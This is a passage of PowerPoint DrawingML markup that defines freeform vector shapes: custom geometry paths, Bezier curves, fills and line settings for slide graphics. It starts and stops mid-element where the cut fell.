                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C89F228-5A0A-441E-BF4E-A236993D9F4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74" y="2932"/>
                  <a:ext cx="45" cy="321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64" name="Freeform 804">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEDE1716-9B16-4B3E-8058-D29EA535402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29" y="2932"/>
                  <a:ext cx="45" cy="321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65" name="Freeform 805">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6907DA0-AE34-4792-A9C7-675617EA7B4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29" y="2866"/>
                  <a:ext cx="45" cy="321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66" name="Freeform 806">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36A172C3-E2C7-4933-A0D9-7B96E923C3F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2866"/>
                  <a:ext cx="49" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 13"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 0 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 13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87">
                      <a:moveTo>
                        <a:pt x="13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3" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13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67" name="Freeform 807">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D0ED53-B235-45E1-AC1B-D4C6FAC33AD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77" y="2705"/>
                  <a:ext cx="45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68" name="Freeform 808">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFF172C-4B3D-4D14-B9EB-1A9958DC12A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77" y="2717"/>
                  <a:ext cx="45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69" name="Freeform 809">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04B210B-7CE3-40BE-8CA0-9EA829E898A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35" y="2717"/>
                  <a:ext cx="42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4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70" name="Freeform 810">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C948682-CA44-4A32-9646-395F2AEC2DA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977" y="2787"/>
                  <a:ext cx="597" cy="206"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 161 w 161"/>
                    <a:gd name="T1" fmla="*/ 43 h 56"/>
                    <a:gd name="T2" fmla="*/ 161 w 161"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 161"/>
                    <a:gd name="T5" fmla="*/ 12 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 161"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 161 w 161"/>
                    <a:gd name="T9" fmla="*/ 43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1" h="56">
                      <a:moveTo>
                        <a:pt x="161" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="56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61" y="43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71" name="Freeform 811">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD3A527-9972-457D-A0EA-FB14B58B69F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74" y="2866"/>
                  <a:ext cx="300" cy="127"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 81 w 81"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 81 w 81"/>
                    <a:gd name="T3" fmla="*/ 13 h 35"/>
                    <a:gd name="T4" fmla="*/ 0 w 81"/>
                    <a:gd name="T5" fmla="*/ 35 h 35"/>
                    <a:gd name="T6" fmla="*/ 0 w 81"/>
                    <a:gd name="T7" fmla="*/ 22 h 35"/>
                    <a:gd name="T8" fmla="*/ 81 w 8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35">
                      <a:moveTo>
                        <a:pt x="81" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="81" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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72" name="Freeform 812">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37401261-5FF9-4E09-A7D6-BFC788B9C83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977" y="2705"/>
                  <a:ext cx="897" cy="240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 242"/>
                    <a:gd name="T1" fmla="*/ 43 h 65"/>
                    <a:gd name="T2" fmla="*/ 161 w 242"/>
                    <a:gd name="T3" fmla="*/ 22 h 65"/>
                    <a:gd name="T4" fmla="*/ 161 w 242"/>
                    <a:gd name="T5" fmla="*/ 22 h 65"/>
                    <a:gd name="T6" fmla="*/ 81 w 242"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 242"/>
                    <a:gd name="T9" fmla="*/ 22 h 65"/>
                    <a:gd name="T10" fmla="*/ 81 w 242"/>
                    <a:gd name="T11" fmla="*/ 44 h 65"/>
                    <a:gd name="T12" fmla="*/ 81 w 242"/>
                    <a:gd name="T13" fmla="*/ 44 h 65"/>
                    <a:gd name="T14" fmla="*/ 161 w 242"/>
                    <a:gd name="T15" fmla="*/ 65 h 65"/>
                    <a:gd name="T16" fmla="*/ 242 w 242"/>
                    <a:gd name="T17" fmla="*/ 43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2" h="65">
                      <a:moveTo>
                        <a:pt x="242" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="43"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8E47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6" name="Group 813">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{923EDDDA-6E7A-4465-B32D-0107B41A78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16" y="1833"/>
                <a:ext cx="90" cy="70"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2153" name="Freeform 814">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E14FEA2A-036B-4A87-9BE8-11815FFE820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90" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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54" name="Freeform 815">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4EC10FC-23C2-45DA-BEDE-5964024A1FF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3" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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55" name="Freeform 816">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C0A483B-8586-487C-8DE4-8E9F504C283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90" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="1189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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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56" name="Freeform 817">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C02E8ADA-FFA1-4E75-90FF-267268D2294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155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1287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57" name="Freeform 818">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284D577D-0E23-4519-A2E3-F8670D508AA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93" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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58" name="Freeform 819">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D94873-6BE5-4185-8753-AA143A80003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155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="165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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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59" name="Freeform 820">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E08C55-388F-458F-B217-2792C204354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51" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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60" name="Freeform 821">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324058FA-8FDA-4339-9430-D407FBE4A4C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04" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5071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7" name="Group 822">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F330A633-1A2C-4D94-BEE4-A3D008BF0B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60" y="1819"/>
                <a:ext cx="110" cy="171"/>
                <a:chOff x="2158" y="1204"/>
                <a:chExt cx="419" cy="647"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2148" name="Freeform 823">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90399AD-B3ED-4ADD-BF12-1083488A55F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94" y="1592"/>
                  <a:ext cx="177" cy="231"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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72549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49" name="Freeform 824">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F756E6CB-5460-4DA4-AC44-A496F49530E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25" y="1575"/>
                  <a:ext cx="326" cy="276"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
